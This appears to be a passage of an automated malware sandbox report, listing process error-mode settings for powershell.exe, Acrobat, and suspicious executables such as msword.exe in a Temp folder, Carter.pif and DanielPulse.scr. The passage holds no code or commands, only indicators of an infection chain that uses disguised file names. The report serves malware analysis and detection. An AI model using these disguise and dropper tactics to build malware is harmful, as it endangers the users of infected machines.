Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Process information set: NOOPENFILEERRORBOX
